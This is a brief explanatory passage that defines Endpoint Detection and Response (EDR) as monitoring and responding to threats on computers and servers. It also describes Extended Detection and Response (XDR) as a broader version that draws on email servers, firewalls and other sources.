Endpoint Detection and Response (EDR) focuses on managing, monitoring, and responding to threats occurring on personal computers, servers, and other endpoints. It is used to detect suspicious activity, analyze behavior, and initiate initial responses to security incidents. EDR accomplishes this by collecting information on the behavior of the computer (through logs, hooks, etc.) and conducting real-time analyses.

Note that the next level of this tool is the Extended Detection and Response (XDR) which is similar in nature but operates on a broader scale. Instead of focusing only on personal computers or workstations, XDR integrates data and response capabilities from multiple sources, including remote applications (such as email servers), network components (such as firewalls), and more. XDR evolved from the initial version of EDR and, while both are capable of identifying and stopping attacks, they differ primarily in the scope of coverage they provide.